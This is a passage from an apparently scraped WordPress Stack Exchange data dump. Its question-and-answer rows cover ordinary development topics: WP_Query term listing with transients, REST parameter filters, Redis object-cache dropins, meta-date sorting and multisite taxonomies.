delete_transient( 'brands_in_category_' . $cat_id );
}
}
}
add_action( 'create_brands', 'clear_brands_in_category_transients', 10, 2 );
```
I used the [create\_{$taxonomy}](https://developer.wordpress.org/reference/hooks/create_taxonomy/) hook above. |
374,975 | <p>I have just deployed the Wordpress application on my Kubernetes cluster following the instructions from <a href="https://kubernetes.io/docs/tutorials/stateful-application/mysql-wordpress-persistent-volume/" rel="nofollow noreferrer">https://kubernetes.io/docs/tutorials/stateful-application/mysql-wordpress-persistent-volume/</a></p>
<p>Now I would like to populate the Wordpress database with a lot of posts for testing purposes. I do not really care about the content of these posts. As far as I am concerned they can be completely random. All I care that there are a lot of them.</p>
<p>Is there a way to do it?</p>
| [
{
"answer_id": 374960,
"author": "DevelJoe",
"author_id": 188571,
"author_profile": "https://wordpress.stackexchange.com/users/188571",
"pm_score": 1,
"selected": false,
"text": "<p>Define your terms as <strong>hierarchical</strong> custom taxonomies, as child taxonomies from the corresponding parent taxonomy you want them to inherit from...? Like this you would only need to query for your parent tax, and simply echo out the respective child taxonomies, if required.</p>\n<p>** UPDATE **</p>\n<p>What you do is query all the terms of a given taxonomy, and use them to query posts having them, so you're creating a WP_Query object for every single brand tax, which is unnecessarily expensive. You should do it the other way around; simply query posts which have terms of the brand taxonomy associated to it (and whichever additional feature you may want to use for the query) ONCE only, and while retrieving these posts (inside your wp_query loop), access the id of the currently queried post in the loop, and retrieve the <code>brand</code> terms associated to it. Sth like this:</p>\n<pre><code>$product_query_args = array(\n 'post_type' => 'your_post_type',\n 'tax_query' => array(\n array(\n 'taxonomy' => 'brand'\n )\n )\n);\n\n$products_request = new WP_Query( $product_query_args );\n\nif ( $products_request->have_posts() ) {\n \n while ( $products_request->have_posts() ) {\n\n $products_request->the_post();\n\n // Get ID of currently iterated post\n $id_of_iterated_product = get_the_ID();\n\n // Retrieve associated brand terms\n $brands = get_the_terms( $id_of_iterated_product, 'brand' );\n\n // Check if there are brand terms associated to iterated post\n if ( ! empty( $brands ) ) {\n\n // If so, iterate through them and get the name of each\n foreach( $brands as $brand_key => $brand_object ) {\n\n $brand_name = $brand_object->name;\n\n // Do whatever you want with it\n\n }\n\n }\n\n }\n\n}\n</code></pre>\n<p>Like this, you actually only make one full query instead of countless, so performance should be better, hopefully. Let me know how this solution suits you.</p>\n<p>To explain it a little further to you why I thought of hierarchical taxonomies; you wrote:</p>\n<p>"I need to list all custom terms (brands) that are associated with products from the category that is currently being viewed."</p>\n<ul>\n<li>From this I understand that there's something like a category filter on your website, and you wanna display all the posts of that category, and then echo out the brands for each of these posts. For this, what you could actually do is simply query posts in function of the selected category (makes your query a lot easier), and then for each post retrieve and spit out the associated brands (which are all child tax's of the queried category, if you defined them to be so). You can however reach the same in querying your products in function of the given category, and then retrieve all the brand tags associated to each retrieved post as I did in my code; maybe that's even better when it comes to performance. But from a logical point of view, using taxonomy hierarchics and one single category query appears to be the easiest and most logical way of doing this.</li>\n</ul>\n"
},
{
"answer_id": 375081,
"author": "Antti Koskinen",
"author_id": 144392,
"author_profile": "https://wordpress.stackexchange.com/users/144392",
"pm_score": 3,
"selected": true,
"text": "<p>To fine-tune DevelJoe's answer a bit more, you could access the queried posts from the global <code>$wp_query</code> instead of doing an extra <code>WP_Query</code>.</p>\n<pre><code>// make the current query available from global variable\nglobal $wp_query;\n// helper variable\n$brands = array();\n// loop queried posts\nforeach ( $wp_query->posts as $queried_post ) {\n // check if they have terms from custom taxonomy\n $current_post_brands = get_the_terms( $queried_post, 'brands' ); // post object accepted here also, not just ID\n if ( ! is_wp_error( $current_post_brands ) && $current_post_brands ) {\n // push found brands to helper variable\n foreach ( $current_post_brands as $current_post_brand ) {\n // avoid having same brands multiple time in the helper variable\n if ( ! isset( $brands[$current_post_brand->term_id] ) ) {\n $brands[$current_post_brand->term_id] = $current_post_brand;\n }\n }\n }\n}\n\n// do something with the brand terms (WP_Term)\nforeach ( $brands as $brand_id => $brand_term ) {\n // yay?\n}\n</code></pre>\n<p>This is probably a faster way, because WP automatically caches the terms of the queried posts - to my undestanding. This caching is dicussed for example here, <a href=\"https://wordpress.stackexchange.com/questions/215871/explanation-of-update-post-meta-term-cache\">Explanation of update_post_(meta/term)_cache</a></p>\n<hr />\n<p><strong>EDIT 23.9.2020</strong></p>\n<p>(<em>Facepalm</em>) Let me try this again...</p>\n<p>One way could be to first query all the posts in the current category. Then loop found posts to check their brand terms. Finally spit out an array of unique brand terms. Optionally you could also save the result into a transient so that the querying and looping doesn't run on every page load, thus saving some server resources.</p>\n<pre><code>function helper_get_brands_in_category( int $cat_id ) {\n $transient = get_transient( 'brands_in_category_' . $cat_id );\n if ( $transient ) {\n return $transient;\n }\n \n $args = array(\n 'post_type' => 'product',\n 'posts_per_page' => 1000, // is this enough?\n 'post_status' => 'publish',\n 'no_found_rows' => true,\n 'update_post_meta_cache' => false, // not needed in this case\n 'fields' => 'ids', // not all post data needed here\n 'tax_query' => array(\n array(\n 'taxonomy' => 'product_cat',\n 'field' => 'term_id',\n 'terms' => $cat_id,\n )\n ),\n );\n $query = new WP_Query( $args );\n $brands = array();\n \n foreach ($query->posts as $post_id) {\n $post_brands = get_the_terms( $post_id, 'brands' );\n if ( ! is_wp_error( $post_brands ) && $post_brands ) {\n foreach ( $post_brands as $post_brand ) {\n if ( ! isset( $brands[$post_brand->term_id] ) ) {\n $brands[$post_brand->term_id] = $post_brand;\n }\n }\n }\n }\n\n set_transient( 'brands_in_category_' . $cat_id, $brands, WEEK_IN_SECONDS ); // change expiration date as needed\n\n return $brands;\n}\n// Usage\n$brands_in_category = helper_get_brands_in_category( get_queried_object_id() );\n</code></pre>\n<p>If you save the brands into transients, then you may also want to invalidate the transients whenever new brands are added. Something along these lines,</p>\n<pre><code>function clear_brands_in_category_transients( $term_id, $tt_id ) {\n $product_cats = get_terms( array(\n 'taxonomy' => 'product_cat',\n 'hide_empty' => false,\n 'fields' => 'ids',\n ) );\n if ( ! is_wp_error( $product_cats ) && $product_cats ) {\n foreach ($product_cats as $cat_id) {\n delete_transient( 'brands_in_category_' . $cat_id );\n }\n }\n}\nadd_action( 'create_brands', 'clear_brands_in_category_transients', 10, 2 );\n</code></pre>\n<p>I used the <a href=\"https://developer.wordpress.org/reference/hooks/create_taxonomy/\" rel=\"nofollow noreferrer\">create_{$taxonomy}</a> hook above.</p>\n"
}
] | 2020/09/16 | [
"https://wordpress.stackexchange.com/questions/374975",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/194759/"
] | I have just deployed the Wordpress application on my Kubernetes cluster following the instructions from <https://kubernetes.io/docs/tutorials/stateful-application/mysql-wordpress-persistent-volume/>
Now I would like to populate the Wordpress database with a lot of posts for testing purposes. I do not really care about the content of these posts. As far as I am concerned they can be completely random. All I care that there are a lot of them.
Is there a way to do it? | To fine-tune DevelJoe's answer a bit more, you could access the queried posts from the global `$wp_query` instead of doing an extra `WP_Query`.
```
// make the current query available from global variable
global $wp_query;
// helper variable
$brands = array();
// loop queried posts
foreach ( $wp_query->posts as $queried_post ) {
// check if they have terms from custom taxonomy
$current_post_brands = get_the_terms( $queried_post, 'brands' ); // post object accepted here also, not just ID
if ( ! is_wp_error( $current_post_brands ) && $current_post_brands ) {
// push found brands to helper variable
foreach ( $current_post_brands as $current_post_brand ) {
// avoid having same brands multiple time in the helper variable
if ( ! isset( $brands[$current_post_brand->term_id] ) ) {
$brands[$current_post_brand->term_id] = $current_post_brand;
}
}
}
}
// do something with the brand terms (WP_Term)
foreach ( $brands as $brand_id => $brand_term ) {
// yay?
}
```
This is probably a faster way, because WP automatically caches the terms of the queried posts - to my undestanding. This caching is dicussed for example here, [Explanation of update\_post\_(meta/term)\_cache](https://wordpress.stackexchange.com/questions/215871/explanation-of-update-post-meta-term-cache)
---
**EDIT 23.9.2020**
(*Facepalm*) Let me try this again...
One way could be to first query all the posts in the current category. Then loop found posts to check their brand terms. Finally spit out an array of unique brand terms. Optionally you could also save the result into a transient so that the querying and looping doesn't run on every page load, thus saving some server resources.
```
function helper_get_brands_in_category( int $cat_id ) {
$transient = get_transient( 'brands_in_category_' . $cat_id );
if ( $transient ) {
return $transient;
}
$args = array(
'post_type' => 'product',
'posts_per_page' => 1000, // is this enough?
'post_status' => 'publish',
'no_found_rows' => true,
'update_post_meta_cache' => false, // not needed in this case
'fields' => 'ids', // not all post data needed here
'tax_query' => array(
array(
'taxonomy' => 'product_cat',
'field' => 'term_id',
'terms' => $cat_id,
)
),
);
$query = new WP_Query( $args );
$brands = array();
foreach ($query->posts as $post_id) {
$post_brands = get_the_terms( $post_id, 'brands' );
if ( ! is_wp_error( $post_brands ) && $post_brands ) {
foreach ( $post_brands as $post_brand ) {
if ( ! isset( $brands[$post_brand->term_id] ) ) {
$brands[$post_brand->term_id] = $post_brand;
}
}
}
}
set_transient( 'brands_in_category_' . $cat_id, $brands, WEEK_IN_SECONDS ); // change expiration date as needed
return $brands;
}
// Usage
$brands_in_category = helper_get_brands_in_category( get_queried_object_id() );
```
If you save the brands into transients, then you may also want to invalidate the transients whenever new brands are added. Something along these lines,
```
function clear_brands_in_category_transients( $term_id, $tt_id ) {
$product_cats = get_terms( array(
'taxonomy' => 'product_cat',
'hide_empty' => false,
'fields' => 'ids',
) );
if ( ! is_wp_error( $product_cats ) && $product_cats ) {
foreach ($product_cats as $cat_id) {
delete_transient( 'brands_in_category_' . $cat_id );
}
}
}
add_action( 'create_brands', 'clear_brands_in_category_transients', 10, 2 );
```
I used the [create\_{$taxonomy}](https://developer.wordpress.org/reference/hooks/create_taxonomy/) hook above. |
375,049 | <p>There is a website where we use WooCommerce infrastructure. I have products for which I use variations, and I want to make variations like the sample site below. When the customer selects the x option from the product with the x y z option, I want the number of names and the price of the checkbox field that I have determined on the product page. Can I do this with a ready-made plugin? Or do you have any suggestions? Thank you.
Sample site: <a href="https://www.bstkafes.com/index.php?page=urunler&urun-grup=k-26&urun=41" rel="nofollow noreferrer">https://www.bstkafes.com/index.php?page=urunler&urun-grup=k-26&urun=41</a></p>
| [
{
"answer_id": 374960,
"author": "DevelJoe",
"author_id": 188571,
"author_profile": "https://wordpress.stackexchange.com/users/188571",
"pm_score": 1,
"selected": false,
"text": "<p>Define your terms as <strong>hierarchical</strong> custom taxonomies, as child taxonomies from the corresponding parent taxonomy you want them to inherit from...? Like this you would only need to query for your parent tax, and simply echo out the respective child taxonomies, if required.</p>\n<p>** UPDATE **</p>\n<p>What you do is query all the terms of a given taxonomy, and use them to query posts having them, so you're creating a WP_Query object for every single brand tax, which is unnecessarily expensive. You should do it the other way around; simply query posts which have terms of the brand taxonomy associated to it (and whichever additional feature you may want to use for the query) ONCE only, and while retrieving these posts (inside your wp_query loop), access the id of the currently queried post in the loop, and retrieve the <code>brand</code> terms associated to it. Sth like this:</p>\n<pre><code>$product_query_args = array(\n 'post_type' => 'your_post_type',\n 'tax_query' => array(\n array(\n 'taxonomy' => 'brand'\n )\n )\n);\n\n$products_request = new WP_Query( $product_query_args );\n\nif ( $products_request->have_posts() ) {\n \n while ( $products_request->have_posts() ) {\n\n $products_request->the_post();\n\n // Get ID of currently iterated post\n $id_of_iterated_product = get_the_ID();\n\n // Retrieve associated brand terms\n $brands = get_the_terms( $id_of_iterated_product, 'brand' );\n\n // Check if there are brand terms associated to iterated post\n if ( ! empty( $brands ) ) {\n\n // If so, iterate through them and get the name of each\n foreach( $brands as $brand_key => $brand_object ) {\n\n $brand_name = $brand_object->name;\n\n // Do whatever you want with it\n\n }\n\n }\n\n }\n\n}\n</code></pre>\n<p>Like this, you actually only make one full query instead of countless, so performance should be better, hopefully. Let me know how this solution suits you.</p>\n<p>To explain it a little further to you why I thought of hierarchical taxonomies; you wrote:</p>\n<p>"I need to list all custom terms (brands) that are associated with products from the category that is currently being viewed."</p>\n<ul>\n<li>From this I understand that there's something like a category filter on your website, and you wanna display all the posts of that category, and then echo out the brands for each of these posts. For this, what you could actually do is simply query posts in function of the selected category (makes your query a lot easier), and then for each post retrieve and spit out the associated brands (which are all child tax's of the queried category, if you defined them to be so). You can however reach the same in querying your products in function of the given category, and then retrieve all the brand tags associated to each retrieved post as I did in my code; maybe that's even better when it comes to performance. But from a logical point of view, using taxonomy hierarchics and one single category query appears to be the easiest and most logical way of doing this.</li>\n</ul>\n"
},
{
"answer_id": 375081,
"author": "Antti Koskinen",
"author_id": 144392,
"author_profile": "https://wordpress.stackexchange.com/users/144392",
"pm_score": 3,
"selected": true,
"text": "<p>To fine-tune DevelJoe's answer a bit more, you could access the queried posts from the global <code>$wp_query</code> instead of doing an extra <code>WP_Query</code>.</p>\n<pre><code>// make the current query available from global variable\nglobal $wp_query;\n// helper variable\n$brands = array();\n// loop queried posts\nforeach ( $wp_query->posts as $queried_post ) {\n // check if they have terms from custom taxonomy\n $current_post_brands = get_the_terms( $queried_post, 'brands' ); // post object accepted here also, not just ID\n if ( ! is_wp_error( $current_post_brands ) && $current_post_brands ) {\n // push found brands to helper variable\n foreach ( $current_post_brands as $current_post_brand ) {\n // avoid having same brands multiple time in the helper variable\n if ( ! isset( $brands[$current_post_brand->term_id] ) ) {\n $brands[$current_post_brand->term_id] = $current_post_brand;\n }\n }\n }\n}\n\n// do something with the brand terms (WP_Term)\nforeach ( $brands as $brand_id => $brand_term ) {\n // yay?\n}\n</code></pre>\n<p>This is probably a faster way, because WP automatically caches the terms of the queried posts - to my undestanding. This caching is dicussed for example here, <a href=\"https://wordpress.stackexchange.com/questions/215871/explanation-of-update-post-meta-term-cache\">Explanation of update_post_(meta/term)_cache</a></p>\n<hr />\n<p><strong>EDIT 23.9.2020</strong></p>\n<p>(<em>Facepalm</em>) Let me try this again...</p>\n<p>One way could be to first query all the posts in the current category. Then loop found posts to check their brand terms. Finally spit out an array of unique brand terms. Optionally you could also save the result into a transient so that the querying and looping doesn't run on every page load, thus saving some server resources.</p>\n<pre><code>function helper_get_brands_in_category( int $cat_id ) {\n $transient = get_transient( 'brands_in_category_' . $cat_id );\n if ( $transient ) {\n return $transient;\n }\n \n $args = array(\n 'post_type' => 'product',\n 'posts_per_page' => 1000, // is this enough?\n 'post_status' => 'publish',\n 'no_found_rows' => true,\n 'update_post_meta_cache' => false, // not needed in this case\n 'fields' => 'ids', // not all post data needed here\n 'tax_query' => array(\n array(\n 'taxonomy' => 'product_cat',\n 'field' => 'term_id',\n 'terms' => $cat_id,\n )\n ),\n );\n $query = new WP_Query( $args );\n $brands = array();\n \n foreach ($query->posts as $post_id) {\n $post_brands = get_the_terms( $post_id, 'brands' );\n if ( ! is_wp_error( $post_brands ) && $post_brands ) {\n foreach ( $post_brands as $post_brand ) {\n if ( ! isset( $brands[$post_brand->term_id] ) ) {\n $brands[$post_brand->term_id] = $post_brand;\n }\n }\n }\n }\n\n set_transient( 'brands_in_category_' . $cat_id, $brands, WEEK_IN_SECONDS ); // change expiration date as needed\n\n return $brands;\n}\n// Usage\n$brands_in_category = helper_get_brands_in_category( get_queried_object_id() );\n</code></pre>\n<p>If you save the brands into transients, then you may also want to invalidate the transients whenever new brands are added. Something along these lines,</p>\n<pre><code>function clear_brands_in_category_transients( $term_id, $tt_id ) {\n $product_cats = get_terms( array(\n 'taxonomy' => 'product_cat',\n 'hide_empty' => false,\n 'fields' => 'ids',\n ) );\n if ( ! is_wp_error( $product_cats ) && $product_cats ) {\n foreach ($product_cats as $cat_id) {\n delete_transient( 'brands_in_category_' . $cat_id );\n }\n }\n}\nadd_action( 'create_brands', 'clear_brands_in_category_transients', 10, 2 );\n</code></pre>\n<p>I used the <a href=\"https://developer.wordpress.org/reference/hooks/create_taxonomy/\" rel=\"nofollow noreferrer\">create_{$taxonomy}</a> hook above.</p>\n"
}
] | 2020/09/18 | [
"https://wordpress.stackexchange.com/questions/375049",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/194805/"
] | There is a website where we use WooCommerce infrastructure. I have products for which I use variations, and I want to make variations like the sample site below. When the customer selects the x option from the product with the x y z option, I want the number of names and the price of the checkbox field that I have determined on the product page. Can I do this with a ready-made plugin? Or do you have any suggestions? Thank you.
Sample site: <https://www.bstkafes.com/index.php?page=urunler&urun-grup=k-26&urun=41> | To fine-tune DevelJoe's answer a bit more, you could access the queried posts from the global `$wp_query` instead of doing an extra `WP_Query`.
```
// make the current query available from global variable
global $wp_query;
// helper variable
$brands = array();
// loop queried posts
foreach ( $wp_query->posts as $queried_post ) {
// check if they have terms from custom taxonomy
$current_post_brands = get_the_terms( $queried_post, 'brands' ); // post object accepted here also, not just ID
if ( ! is_wp_error( $current_post_brands ) && $current_post_brands ) {
// push found brands to helper variable
foreach ( $current_post_brands as $current_post_brand ) {
// avoid having same brands multiple time in the helper variable
if ( ! isset( $brands[$current_post_brand->term_id] ) ) {
$brands[$current_post_brand->term_id] = $current_post_brand;
}
}
}
}
// do something with the brand terms (WP_Term)
foreach ( $brands as $brand_id => $brand_term ) {
// yay?
}
```
This is probably a faster way, because WP automatically caches the terms of the queried posts - to my undestanding. This caching is dicussed for example here, [Explanation of update\_post\_(meta/term)\_cache](https://wordpress.stackexchange.com/questions/215871/explanation-of-update-post-meta-term-cache)
---
**EDIT 23.9.2020**
(*Facepalm*) Let me try this again...
One way could be to first query all the posts in the current category. Then loop found posts to check their brand terms. Finally spit out an array of unique brand terms. Optionally you could also save the result into a transient so that the querying and looping doesn't run on every page load, thus saving some server resources.
```
function helper_get_brands_in_category( int $cat_id ) {
$transient = get_transient( 'brands_in_category_' . $cat_id );
if ( $transient ) {
return $transient;
}
$args = array(
'post_type' => 'product',
'posts_per_page' => 1000, // is this enough?
'post_status' => 'publish',
'no_found_rows' => true,
'update_post_meta_cache' => false, // not needed in this case
'fields' => 'ids', // not all post data needed here
'tax_query' => array(
array(
'taxonomy' => 'product_cat',
'field' => 'term_id',
'terms' => $cat_id,
)
),
);
$query = new WP_Query( $args );
$brands = array();
foreach ($query->posts as $post_id) {
$post_brands = get_the_terms( $post_id, 'brands' );
if ( ! is_wp_error( $post_brands ) && $post_brands ) {
foreach ( $post_brands as $post_brand ) {
if ( ! isset( $brands[$post_brand->term_id] ) ) {
$brands[$post_brand->term_id] = $post_brand;
}
}
}
}
set_transient( 'brands_in_category_' . $cat_id, $brands, WEEK_IN_SECONDS ); // change expiration date as needed
return $brands;
}
// Usage
$brands_in_category = helper_get_brands_in_category( get_queried_object_id() );
```
If you save the brands into transients, then you may also want to invalidate the transients whenever new brands are added. Something along these lines,
```
function clear_brands_in_category_transients( $term_id, $tt_id ) {
$product_cats = get_terms( array(
'taxonomy' => 'product_cat',
'hide_empty' => false,
'fields' => 'ids',
) );
if ( ! is_wp_error( $product_cats ) && $product_cats ) {
foreach ($product_cats as $cat_id) {
delete_transient( 'brands_in_category_' . $cat_id );
}
}
}
add_action( 'create_brands', 'clear_brands_in_category_transients', 10, 2 );
```
I used the [create\_{$taxonomy}](https://developer.wordpress.org/reference/hooks/create_taxonomy/) hook above. |
375,160 | <p>I work on a project that shows some travels (depending on the destination category). I try to sort the travels on the start date (var_confirmed_date) but the result is the same as no sorting.</p>
<p>Here is my query:</p>
<pre><code>`$args = array(
'posts_per_page' => -1,
'post_type' => 'product',
'meta_value' => 'meta_value',
'meta_key' => 'var_confirmed_date',
'order' => 'ASC',
'meta_type' => 'DATE',
'tax_query' => array(
array(
'taxonomy' => 'destination',
'field' => 'id',
'terms' => array($t_id)
)
),
'meta_query' => array(
array(
'key' => 'var_confirmed_date',
'value' => date("Y-m-d",time()),
'compare' => '>=',
'type' => 'DATE',
),
),
);
$loop = new WP_Query( $args );`
</code></pre>
<p>Any idea to make it work correctly?</p>
<p>Thanks.</p>
| [
{
"answer_id": 375151,
"author": "Cyclonecode",
"author_id": 14870,
"author_profile": "https://wordpress.stackexchange.com/users/14870",
"pm_score": 0,
"selected": false,
"text": "<p>You will need to make sure so you have the redis php extension installed and enabled. You can check the list of installed modules using:</p>\n<pre><code>php -m | grep redis\n</code></pre>\n<p>Make sure the extension is enabled:</p>\n<pre><code>sudo phpenmod redis\n</code></pre>\n<p>To install the redis extension:</p>\n<pre><code>sudo apt-get install php-redis\n</code></pre>\n<p>Depending on how php is configured and running you might have to restart your webserver and/or php-fpm service:</p>\n<pre><code>sudo service apache2 restart\nsudo service php7.3-fpm restart\n</code></pre>\n<p>Of course you would have to change to above to match your environment.</p>\n"
},
{
"answer_id": 375179,
"author": "fuxia",
"author_id": 73,
"author_profile": "https://wordpress.stackexchange.com/users/73",
"pm_score": 2,
"selected": true,
"text": "<p>The file <code>wp-content/object-cache.php</code> is one of the <a href=\"https://wpengineer.com/2500/wordpress-dropins/\" rel=\"nofollow noreferrer\">dropins</a> – PHP files with custom code that are not plugins. It is used when you are using a <a href=\"https://codex.wordpress.org/Class_Reference/WP_Object_Cache#Persistent_Cache_Plugins\" rel=\"nofollow noreferrer\">persistent object cache plugin</a>, and it will be loaded automatically.</p>\n<p>Normally the plugin will create that file. But if you move all the files without the plugin, the code in that file doesn't work anymore, and you get your error message.</p>\n<p>So you either have to delete the file, or install the plugin again. In this case probably the <a href=\"https://wordpress.org/plugins/redis-cache/\" rel=\"nofollow noreferrer\">Redis Object Cache</a> plugin.</p>\n"
}
] | 2020/09/20 | [
"https://wordpress.stackexchange.com/questions/375160",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/194888/"
] | I work on a project that shows some travels (depending on the destination category). I try to sort the travels on the start date (var\_confirmed\_date) but the result is the same as no sorting.
Here is my query:
```
`$args = array(
'posts_per_page' => -1,
'post_type' => 'product',
'meta_value' => 'meta_value',
'meta_key' => 'var_confirmed_date',
'order' => 'ASC',
'meta_type' => 'DATE',
'tax_query' => array(
array(
'taxonomy' => 'destination',
'field' => 'id',
'terms' => array($t_id)
)
),
'meta_query' => array(
array(
'key' => 'var_confirmed_date',
'value' => date("Y-m-d",time()),
'compare' => '>=',
'type' => 'DATE',
),
),
);
$loop = new WP_Query( $args );`
```
Any idea to make it work correctly?
Thanks. | The file `wp-content/object-cache.php` is one of the [dropins](https://wpengineer.com/2500/wordpress-dropins/) – PHP files with custom code that are not plugins. It is used when you are using a [persistent object cache plugin](https://codex.wordpress.org/Class_Reference/WP_Object_Cache#Persistent_Cache_Plugins), and it will be loaded automatically.
Normally the plugin will create that file. But if you move all the files without the plugin, the code in that file doesn't work anymore, and you get your error message.
So you either have to delete the file, or install the plugin again. In this case probably the [Redis Object Cache](https://wordpress.org/plugins/redis-cache/) plugin. |
375,198 | <p>I'm trying to use a REST filter to require a certain parameter is set.</p>
<p>Using custom taxonomies and custom posts I've been able to make it so when I request</p>
<pre><code>/wp-json/wp/v2/car?visible_to=123
</code></pre>
<p>That the only <code>Car</code>s that come back are ones with a <code>visible_to</code> taxonomy of 123.</p>
<p>However when someone asks for</p>
<pre><code>/wp-json/wp/v2/car
</code></pre>
<p>I want to throw an error, saying that ?visible_to needs to be set.</p>
<p>I've tried hooking into <code>rest_index</code>, <code>rest_pre_dispatch</code>, and some others. Each only fires when I have <code>?visible_to</code> set in the URL, without them the hooks don't fire.</p>
<p>For example, I would expect this to fire on every REST request</p>
<pre><code>add_filter( 'rest_pre_dispatch','to_limit_access', 1, 3);
function to_limit_access($args, $request, $context) {
return new WP_Error( 'rest_disabled', __( 'The REST API is disabled on this site.' ), array( 'status' => 404 ) );
}
</code></pre>
<p>But it will only return a WP_Error on</p>
<pre><code>/wp-json/wp/v2/car?visible_to=123
</code></pre>
<p>Both</p>
<pre><code>/wp-json/wp/v2/car
</code></pre>
<p>And</p>
<pre><code>/wp-json/wp/v2/car/6
</code></pre>
<p>Run without that filter being hit.</p>
<p>Can someone explain why this would be the case and what I can do to avoid it?</p>
<p>I've also tried specific filters like <code>rest_prepare_car</code> but I couldn't get it to fire at all.</p>
| [
{
"answer_id": 375200,
"author": "Toby",
"author_id": 1213,
"author_profile": "https://wordpress.stackexchange.com/users/1213",
"pm_score": 0,
"selected": false,
"text": "<p>In turns out we had a caching plugin enabled that was getting in the way of some requests but not others, leading to this inconsistency.</p>\n"
},
{
"answer_id": 375205,
"author": "Jacob Peattie",
"author_id": 39152,
"author_profile": "https://wordpress.stackexchange.com/users/39152",
"pm_score": 2,
"selected": true,
"text": "<p>If you want a parameter to be required for a post type's REST API endpoint you can use the <a href=\"https://developer.wordpress.org/reference/hooks/rest_this-post_type_collection_params/\" rel=\"nofollow noreferrer\"><code>rest_{$this->post_type}_collection_params</code></a> filter to filter the <a href=\"https://developer.wordpress.org/rest-api/extending-the-rest-api/adding-custom-endpoints/#arguments\" rel=\"nofollow noreferrer\"><code>$args</code></a> of the <code>GET</code> endpoint:</p>\n<pre><code>add_filter(\n 'rest_car_collection_params',\n function( array $query_params ) {\n $query_params['visible_to']['required'] = true;\n \n return $query_params;\n }\n);\n</code></pre>\n"
}
] | 2020/09/21 | [
"https://wordpress.stackexchange.com/questions/375198",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/1213/"
] | I'm trying to use a REST filter to require a certain parameter is set.
Using custom taxonomies and custom posts I've been able to make it so when I request
```
/wp-json/wp/v2/car?visible_to=123
```
That the only `Car`s that come back are ones with a `visible_to` taxonomy of 123.
However when someone asks for
```
/wp-json/wp/v2/car
```
I want to throw an error, saying that ?visible\_to needs to be set.
I've tried hooking into `rest_index`, `rest_pre_dispatch`, and some others. Each only fires when I have `?visible_to` set in the URL, without them the hooks don't fire.
For example, I would expect this to fire on every REST request
```
add_filter( 'rest_pre_dispatch','to_limit_access', 1, 3);
function to_limit_access($args, $request, $context) {
return new WP_Error( 'rest_disabled', __( 'The REST API is disabled on this site.' ), array( 'status' => 404 ) );
}
```
But it will only return a WP\_Error on
```
/wp-json/wp/v2/car?visible_to=123
```
Both
```
/wp-json/wp/v2/car
```
And
```
/wp-json/wp/v2/car/6
```
Run without that filter being hit.
Can someone explain why this would be the case and what I can do to avoid it?
I've also tried specific filters like `rest_prepare_car` but I couldn't get it to fire at all. | If you want a parameter to be required for a post type's REST API endpoint you can use the [`rest_{$this->post_type}_collection_params`](https://developer.wordpress.org/reference/hooks/rest_this-post_type_collection_params/) filter to filter the [`$args`](https://developer.wordpress.org/rest-api/extending-the-rest-api/adding-custom-endpoints/#arguments) of the `GET` endpoint:
```
add_filter(
'rest_car_collection_params',
function( array $query_params ) {
$query_params['visible_to']['required'] = true;
return $query_params;
}
);
``` |
375,220 | <p>I am fetching data from an API using JS. How can I use this data with PHP. More specifically, assign this data to a <code>$_SESSION</code> variable in PHP so that I can use it in other pages(templates files)?</p>
| [
{
"answer_id": 375200,
"author": "Toby",
"author_id": 1213,
"author_profile": "https://wordpress.stackexchange.com/users/1213",
"pm_score": 0,
"selected": false,
"text": "<p>In turns out we had a caching plugin enabled that was getting in the way of some requests but not others, leading to this inconsistency.</p>\n"
},
{
"answer_id": 375205,
"author": "Jacob Peattie",
"author_id": 39152,
"author_profile": "https://wordpress.stackexchange.com/users/39152",
"pm_score": 2,
"selected": true,
"text": "<p>If you want a parameter to be required for a post type's REST API endpoint you can use the <a href=\"https://developer.wordpress.org/reference/hooks/rest_this-post_type_collection_params/\" rel=\"nofollow noreferrer\"><code>rest_{$this->post_type}_collection_params</code></a> filter to filter the <a href=\"https://developer.wordpress.org/rest-api/extending-the-rest-api/adding-custom-endpoints/#arguments\" rel=\"nofollow noreferrer\"><code>$args</code></a> of the <code>GET</code> endpoint:</p>\n<pre><code>add_filter(\n 'rest_car_collection_params',\n function( array $query_params ) {\n $query_params['visible_to']['required'] = true;\n \n return $query_params;\n }\n);\n</code></pre>\n"
}
] | 2020/09/21 | [
"https://wordpress.stackexchange.com/questions/375220",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/148212/"
] | I am fetching data from an API using JS. How can I use this data with PHP. More specifically, assign this data to a `$_SESSION` variable in PHP so that I can use it in other pages(templates files)? | If you want a parameter to be required for a post type's REST API endpoint you can use the [`rest_{$this->post_type}_collection_params`](https://developer.wordpress.org/reference/hooks/rest_this-post_type_collection_params/) filter to filter the [`$args`](https://developer.wordpress.org/rest-api/extending-the-rest-api/adding-custom-endpoints/#arguments) of the `GET` endpoint:
```
add_filter(
'rest_car_collection_params',
function( array $query_params ) {
$query_params['visible_to']['required'] = true;
return $query_params;
}
);
``` |
375,267 | <h2>Background</h2>
<p>I need to retrieve terms for a post in an arbitrary site on a multisite network. This is not necessarily the site that the WP instance is running in at that moment. <code>wp_get_object_terms()</code> requires the taxonomy for which to retrieve the terms. So, to retrieve all terms for all taxonomies, it would be necessary to first retrieve the taxonomies. This does not appear to be possible, as the taxonomies that are registered by plugins may not be getting registered on the <em>current</em> (original) site that the instance is running in, because the plugins themselves would not be active on that site.</p>
<h2>Question</h2>
<p>How can I retrieve all taxonomies of an <em>arbitrary</em> site <em>programmatically</em>?
In other words, given that I have a site <code>$siteId</code>, how can I retrieve all taxonomies on that site?</p>
<p>Alternatively, how can I retrieve all taxonomy terms for a post in an <em>arbitrary</em> site <em>programmatically</em>?
In other words, given post <code>$post</code> and site <code>$siteId</code>, how can I retrieve all terms for all taxonomies of that post in that site?</p>
| [
{
"answer_id": 375278,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 2,
"selected": false,
